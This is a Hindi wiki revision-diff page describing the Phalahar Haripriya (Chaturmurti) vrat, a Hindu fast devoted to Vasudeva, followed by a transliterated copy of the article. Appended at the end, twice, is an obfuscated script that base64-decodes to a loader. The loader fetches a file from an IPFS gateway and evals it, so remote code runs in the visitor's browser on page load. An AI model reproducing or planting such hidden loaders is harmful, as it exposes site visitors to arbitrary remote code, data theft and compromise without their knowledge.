Difference between revisions of "फलाहार हरिप्रिय व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*विष्णुधर्मात्तरपुराण <ref>विष्णुधर्मात्तरपुराण (3|149|1-10)</ref> में इसे 'चतुर्मूर्तिव्रत' कहा गया है।  
+
*विष्णुधर्मात्तरपुराण<ref>विष्णुधर्मात्तरपुराण (3|149|1-10</ref> में इसे 'चतुर्मूर्तिव्रत' कहा गया है।  
 
*बसन्त में विषुव दिन पर 3 दिनों के लिए उपवास आरम्भ किया जाता है।  
 
*बसन्त में विषुव दिन पर 3 दिनों के लिए उपवास आरम्भ किया जाता है।  
*इस व्रत में [[वासुदेव]] पूजा की जाती है।  
+
*इस व्रत में [[विष्णु|वासुदेव]] पूजा की जाती है।  
 
*तीन मासों तक प्रतिदिन वासुदेव की पूजा की जाती है।  
 
*तीन मासों तक प्रतिदिन वासुदेव की पूजा की जाती है।  
 
*तीन मासों तक केवल फलों का ही सेवन किया जाता है।  
 
*तीन मासों तक केवल फलों का ही सेवन किया जाता है।  
Line 12: Line 12:
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:53, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vishnudharmattarapuran[1] mean ise 'chaturmoortivrat' kaha gaya hai.
  • basant mean vishuv din par 3 dinoan ke lie upavas arambh kiya jata hai.
  • is vrat mean vasudev pooja ki jati hai.
  • tin masoan tak pratidin vasudev ki pooja ki jati hai.
  • tin masoan tak keval phaloan ka hi sevan kiya jata hai.
  • sharad vishuv mean tin masoan tak upavas kiya jata hai.
  • pradyumn pooja ki jati hai. keval yavak par hi rahana chahie.
  • varsh ke ant mean brahmanoan ko dan karana chahie.
  • aisi manyata hai ki is vrat ko karane se vishnulok ki prapti hoti hai.

 


tika tippani aur sandarbh

  1. vishnudharmattarapuran (3|149|1-10

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>